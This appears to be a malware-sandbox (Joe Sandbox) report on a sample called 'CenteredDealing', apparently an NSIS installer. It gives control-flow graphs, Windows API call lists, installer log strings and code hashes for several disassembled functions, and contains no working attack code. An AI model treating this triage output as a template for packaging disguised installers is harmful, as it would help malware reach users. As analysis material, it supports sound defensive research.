                                                                                                                                                                                                                                                                control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(9732,00002004), ref: 00406958
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(9732,00002004), ref: 0040696B
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(9732,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(9732,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                • String ID: 9732$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                • API String ID: 3581403547-2420053876
                                                                                                                                                                                                                                                                • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                                                                                                                                                                                Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 886 4074bb-4074c0 887 4074c2-4074ef 886->887 888 40752f-407547 886->888 890 4074f1-4074f4 887->890 891 4074f6-4074fa 887->891 889 407aeb-407aff 888->889 895 407b01-407b17 889->895 896 407b19-407b2c 889->896 892 407506-407509 890->892 893 407502 891->893 894 4074fc-407500 891->894 897 407527-40752a 892->897 898 40750b-407514 892->898 893->892 894->892 899 407b33-407b3a 895->899 896->899 902 4076f6-407713 897->902 903 407516 898->903 904 407519-407525 898->904 900 407b61-407c68 899->900 901 407b3c-407b40 899->901 917 407350 900->917 918 407cec 900->918 906 407b46-407b5e 901->906 907 407ccd-407cd4 901->907 909 407715-407729 902->909 910 40772b-40773e 902->910 903->904 905 407589-4075b6 904->905 913 4075d2-4075ec 905->913 914 4075b8-4075d0 905->914 906->900 911 407cdd-407cea 907->911 915 407741-40774b 909->915 910->915 916 407cef-407cf6 911->916 919 4075f0-4075fa 913->919 914->919 920 40774d 915->920 921 4076ee-4076f4 915->921 922 407357-40735b 917->922 923 40749b-4074b6 917->923 924 40746d-407471 917->924 925 4073ff-407403 917->925 918->916 928 407600 919->928 929 407571-407577 919->929 930 407845-4078a1 920->930 931 4076c9-4076cd 920->931 921->902 927 407692-40769c 921->927 922->911 932 407361-40736e 922->932 923->889 937 407c76-407c7d 924->937 938 407477-40748b 924->938 943 407409-407420 925->943 944 407c6d-407c74 925->944 933 4076a2-4076c4 927->933 934 407c9a-407ca1 927->934 946 407556-40756e 928->946 947 407c7f-407c86 928->947 935 40762a-407630 929->935 936 40757d-407583 929->936 930->889 939 407c91-407c98 931->939 940 4076d3-4076eb 931->940 932->918 948 407374-4073ba 932->948 933->930 934->911 949 40768e 935->949 950 407632-40764f 935->950 936->905 936->949 937->911 945 40748e-407496 938->945 939->911 940->921 951 407423-407427 943->951 944->911 945->924 955 407498 945->955 946->929 947->911 953 4073e2-4073e4 948->953 954 4073bc-4073c0 948->954 949->927 956 407651-407665 950->956 957 407667-40767a 950->957 951->925 952 407429-40742f 951->952 959 407431-407438 952->959 960 407459-40746b 952->960 963 4073f5-4073fd 953->963 964 4073e6-4073f3 953->964 961 4073c2-4073c5 GlobalFree 954->961 962 4073cb-4073d9 GlobalAlloc 954->962 955->923 958 40767d-407687 956->958 957->958 958->935 965 407689 958->965 966 407443-407453 GlobalAlloc 959->966 967 40743a-40743d GlobalFree 959->967 960->945 961->962 962->918 968 4073df 962->968 963->951 964->963 964->964 970 407c88-407c8f 965->970 971 40760f-407627 965->971 966->918 966->960 967->966 968->953 970->911 971->935
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                                                                                                                Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                                                                                                                • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                                                                                                                Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                                                                                                                                                                                                Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow EndDialog 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                • String ID: @rD
                                                                                                                                                                                                                                                                • API String ID: 3282139019-3814967855
                                                                                                                                                                                                                                                                • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                                                                                                                                                                                                Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
